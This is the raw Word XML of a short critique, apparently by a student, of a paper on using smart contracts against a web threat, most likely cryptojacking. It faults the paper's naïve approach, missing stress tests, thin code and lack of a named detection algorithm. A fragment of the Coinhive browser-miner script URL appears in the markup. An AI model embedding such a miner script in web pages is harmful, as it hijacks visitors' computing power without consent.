          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00B96184" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>my point of view, this paper is weak paper and can’t be relied on due to the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CACA58" w14:textId="5469D7E3" w:rsidR="00B96184" w:rsidRPr="00C829DC" w:rsidRDefault="00B96184" w:rsidP="00B96184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The approach that this paper takes is very Naïve and doesn’t introduce any new concept, instead it uses an already existing tools to solve a dangerous problem in a Naïve </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>way</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B8BFA93" w14:textId="67AF18E9" w:rsidR="00B96184" w:rsidRPr="00C829DC" w:rsidRDefault="00B96184" w:rsidP="00B96184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The writer of the paper said and I quote what he </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>said :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> “the smart contract of the research department did not undergo extensive stress testing. When too much data is accessed by the contract, the result is unknow.” And continued by saying “However, the large-scale testing of smart contracts has not yet been achieved in the context of this study.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which means that this paper can’t be relied on when talking about thousands of websites as according to the writer, the behavior of the smart contracts will be undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B9955" w14:textId="3FA77C96" w:rsidR="00B96184" w:rsidRPr="00C829DC" w:rsidRDefault="00FB4E95" w:rsidP="00B96184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The writer gave a link to a GitHub repo at the end of the paper that should contain all the codes that proves the point of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>writer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it was only 2 files written in Solidity (a programming language that’s used to write smart contracts of Ethereum) and each file was about 120 lines of code with a very naïve approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176351CC" w14:textId="55A9BB07" w:rsidR="00FB4E95" w:rsidRPr="00C829DC" w:rsidRDefault="00FB4E95" w:rsidP="00B96184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The paper was only cited 3 times since 2020 and the writer didn’t provide a strong evidence that could prove his idea is going to work (mostly it was like personal thoughts not built on scientific proof)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED41BD4" w14:textId="0571B53B" w:rsidR="00CC4B03" w:rsidRPr="00A82C3A" w:rsidRDefault="00610E61" w:rsidP="00A82C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The paper didn’t provide, explain and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> any detection algorithm instead it only referred to a reference paper.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CC4B03" w:rsidRPr="00A82C3A" w:rsidSect="00B37D4D">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2F95D" w14:textId="77777777" w:rsidR="00553A98" w:rsidRDefault="00553A98" w:rsidP="00B37D4D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0CACBDD0" w14:textId="77777777" w:rsidR="00553A98" w:rsidRDefault="00553A98" w:rsidP="00B37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FCFFE" w14:textId="77777777" w:rsidR="00553A98" w:rsidRDefault="00553A98" w:rsidP="00B37D4D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="113257E2" w14:textId="77777777" w:rsidR="00553A98" w:rsidRDefault="00553A98" w:rsidP="00B37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66B21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDDC8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66E2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CCCA436"/>
    <w:lvl w:ilvl="0" w:tplc="8440F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356850">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1301036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D4D"/>
    <w:rsid w:val="00001011"/>
    <w:rsid w:val="000150A9"/>
    <w:rsid w:val="000519F7"/>
    <w:rsid w:val="000645AB"/>
    <w:rsid w:val="00076402"/>
    <w:rsid w:val="000B3C22"/>
    <w:rsid w:val="000E38BE"/>
    <w:rsid w:val="00125B75"/>
    <w:rsid w:val="00142A05"/>
    <w:rsid w:val="001656B6"/>
    <w:rsid w:val="001C7BD3"/>
    <w:rsid w:val="002037EF"/>
    <w:rsid w:val="00205FE3"/>
    <w:rsid w:val="002A2902"/>
    <w:rsid w:val="002C308F"/>
    <w:rsid w:val="002F26E9"/>
    <w:rsid w:val="00327AE5"/>
    <w:rsid w:val="003312FF"/>
    <w:rsid w:val="00343151"/>
    <w:rsid w:val="00383295"/>
    <w:rsid w:val="003E2375"/>
    <w:rsid w:val="004B7FF4"/>
    <w:rsid w:val="00517041"/>
    <w:rsid w:val="00524506"/>
    <w:rsid w:val="00553A98"/>
    <w:rsid w:val="0059247A"/>
    <w:rsid w:val="005D29AE"/>
    <w:rsid w:val="00601B80"/>
    <w:rsid w:val="00610E61"/>
    <w:rsid w:val="0061155C"/>
    <w:rsid w:val="00627F3A"/>
    <w:rsid w:val="00687538"/>
    <w:rsid w:val="00806493"/>
    <w:rsid w:val="00854AE4"/>
    <w:rsid w:val="008A4088"/>
    <w:rsid w:val="008A7E63"/>
    <w:rsid w:val="009D05C2"/>
    <w:rsid w:val="009E5CB4"/>
    <w:rsid w:val="00A03FBB"/>
    <w:rsid w:val="00A20380"/>
    <w:rsid w:val="00A82C3A"/>
    <w:rsid w:val="00AA44F9"/>
    <w:rsid w:val="00AA50FA"/>
    <w:rsid w:val="00B37D4D"/>
    <w:rsid w:val="00B96184"/>
    <w:rsid w:val="00B97560"/>
    <w:rsid w:val="00BD1574"/>
    <w:rsid w:val="00C11256"/>
    <w:rsid w:val="00C32E57"/>
    <w:rsid w:val="00C364B6"/>
    <w:rsid w:val="00C829DC"/>
    <w:rsid w:val="00CB5D7F"/>
    <w:rsid w:val="00CC4B03"/>
    <w:rsid w:val="00CF73BE"/>
    <w:rsid w:val="00D6102C"/>
    <w:rsid w:val="00D642AE"/>
    <w:rsid w:val="00DF3C4F"/>
    <w:rsid w:val="00E36E31"/>
    <w:rsid w:val="00E555A0"/>
    <w:rsid w:val="00E61B0A"/>
    <w:rsid w:val="00E76BFA"/>
    <w:rsid w:val="00EA2C57"/>
    <w:rsid w:val="00EB672D"/>
    <w:rsid w:val="00F004C4"/>
    <w:rsid w:val="00F54C25"/>
    <w:rsid w:val="00FB4E95"/>
    <w:rsid w:val="00FB70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9F84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F47EC481-368A-4E93-918D-C93F1CCF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D4D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B37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D4D"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B37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B37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B97560"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B97560"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B96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631563">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1691835924">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="15"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1953315360">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127452"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inhive.com/lib/coinhive.min.j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D4A6B-7E29-49B7-AD7F-D1FAF2152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6</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salem</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>abdo salem</cp:lastModifiedBy>
  <cp:revision>39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-17T09:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>